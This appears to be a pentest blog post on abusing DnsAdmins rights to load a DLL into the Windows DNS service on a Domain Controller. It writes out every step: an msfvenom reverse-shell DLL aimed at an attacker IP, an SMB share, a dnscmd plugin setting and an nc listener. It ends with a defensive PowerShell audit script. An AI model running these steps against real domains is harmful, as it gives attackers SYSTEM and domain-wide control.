Windows Privilege Escalation: DNSAdmin to Domain Admin via DLL Injection

Udesh


Hi everyone, today I will be writing about a privilege escalation technique that I used in a recent pentest. This technique is a bit different from the usual ones and I thought it would be a good idea to share it with you all.

Introduction

DNSAdmin to Domain Admin DLL Injection is a privilege escalation technique that exploits the ServerLevelPluginDll setting of the Windows DNS service. By leveraging the permissions granted to members of the DNSAdmins group, an attacker can make the DNS service load an arbitrary DLL. On a Domain Controller the DNS service runs under the SYSTEM context, so the DLL executes with SYSTEM-level privileges, which on a DC effectively makes the attacker a Domain Admin.

How it Works:

  1. Compromise a DNSAdmin User: The attacker gains access to a user account that is a member of the DNSAdmins group.
  2. Create a Malicious DLL: The attacker develops a DLL that contains malicious code designed to execute with SYSTEM privileges.
  3. Inject the DLL: The attacker uses the DNSAdmin permissions to point the DNS service's server-level plugin DLL setting at the malicious DLL.
  4. Trigger the Payload: The attacker triggers the payload by restarting the DNS service, causing the malicious DLL to execute with SYSTEM privileges.

Prepping

First, let's check whether our user is part of the DNSAdmins group.

Type the following command in the command prompt:

C:\>whoami /all

[Screenshot: whoami /all output showing DnsAdmins group membership]

As you can see, our user is already in the DNSAdmins group (MEGABANK\DnsAdmins).

Creating & Serving the Malicious DLL

Now, we need to prepare a DLL that will be loaded as the serverlevelplugindll. We'll use the msfvenom tool for this.

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.X LPORT=4444 --platform=windows -f dll > ~/Desktop/plugin.dll

Next, let's use Impacket's smbserver.py to serve this DLL (copied into the shared directory) over SMB so the DNS server can load it from our machine.

$ sudo python smbserver.py -debug SHARE /home/kali/share

Injecting the DLL

Now, we need to inject the malicious DLL into the DNS service. We can do this using the dnscmd tool, which sets the server's serverlevelplugindll value to the UNC path of the DLL on our share.

C:\>dnscmd.exe BANK.local /config /serverlevelplugindll \\10.10.10.X\SHARE\plugin.dll

Before you continue, make sure you have started your listener on the attacking machine to catch the reverse shell.

$ nc -nlvp 4444

Triggering the Payload

To trigger the payload, we need to restart the DNS service. We can do this using the following commands:

C:\>sc.exe stop dns
C:\>sc.exe start dns

If everything goes well, you should receive a reverse shell on your attacking machine. 😎
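For the defensive side of the two checks this post relies on, the DnsAdmins membership from the Prepping section and the serverlevelplugindll setting from the Injecting section, here is an added PowerShell audit script. It is not part of the original post; it assumes the ActiveDirectory RSAT module is installed, that the account running it can remote (WinRM) to the DNS servers, and that the DNS service stores the plugin path in the ServerLevelPluginDll value under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters. The parameter names ($DnsServers, -Remove) are choices made for this example.

```powershell
# Added example (not from the original post): audit the DnsAdmins -> ServerLevelPluginDll abuse path.
# Assumes: ActiveDirectory module, WinRM access to the DNS servers, local admin rights on them.
param(
    [string[]]$DnsServers = @(),   # hypothetical parameter: defaults to all DCs when empty
    [switch]$Remove                # hypothetical parameter: clear a ServerLevelPluginDll value that is set
)

Import-Module ActiveDirectory -ErrorAction Stop

# 1. Who is able to change DNS server settings? Recursive membership catches nested groups.
Write-Host "== DnsAdmins members (recursive) =="
Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
    Select-Object SamAccountName, objectClass, distinguishedName |
    Format-Table -AutoSize

if (-not $DnsServers) {
    # DNS normally runs on the Domain Controllers, so audit all of them by default
    $DnsServers = (Get-ADDomainController -Filter *).HostName
}

$regPath = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

foreach ($server in $DnsServers) {
    $result = Invoke-Command -ComputerName $server -ArgumentList $regPath, [bool]$Remove -ScriptBlock {
        param($regPath, $remove)

        # 2. Is a server-level plugin DLL configured at all? On most servers it should be absent.
        $value = (Get-ItemProperty -Path $regPath -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll
        $status = 'not set'
        if ($value) {
            # A UNC path, or any DLL outside System32, matches the pattern used in the post above
            if ($value -like '\\*' -or $value -notlike "$env:SystemRoot\System32\*") {
                $status = 'SUSPICIOUS'
            } else {
                $status = 'set (local System32 path)'
            }
            if ($remove) {
                Remove-ItemProperty -Path $regPath -Name ServerLevelPluginDll
            }
        }

        # 3. Was the DNS service bounced recently? Loading the DLL needs a restart, which the
        #    Service Control Manager logs as System event 7036 ("... service entered the ... state").
        $restarts = Get-WinEvent -FilterHashtable @{
                LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7036
                StartTime = (Get-Date).AddDays(-7)
            } -ErrorAction SilentlyContinue |
            Where-Object { $_.Message -like '*DNS Server service*' } |
            Select-Object -ExpandProperty TimeCreated

        [pscustomobject]@{
            Server            = $env:COMPUTERNAME
            PluginDll         = $value
            Status            = $status
            DnsRestartsLast7d = @($restarts).Count
            Removed           = [bool]($remove -and $value)
        }
    }
    $result | Format-List
}
```

Run it without parameters to get a read-only report for every Domain Controller; add -Remove once a flagged value has been confirmed as unwanted. A non-empty DnsAdmins list is expected, but every member on it can reach SYSTEM on the DC through the steps in this post, so the group deserves the same scrutiny as Domain Admins.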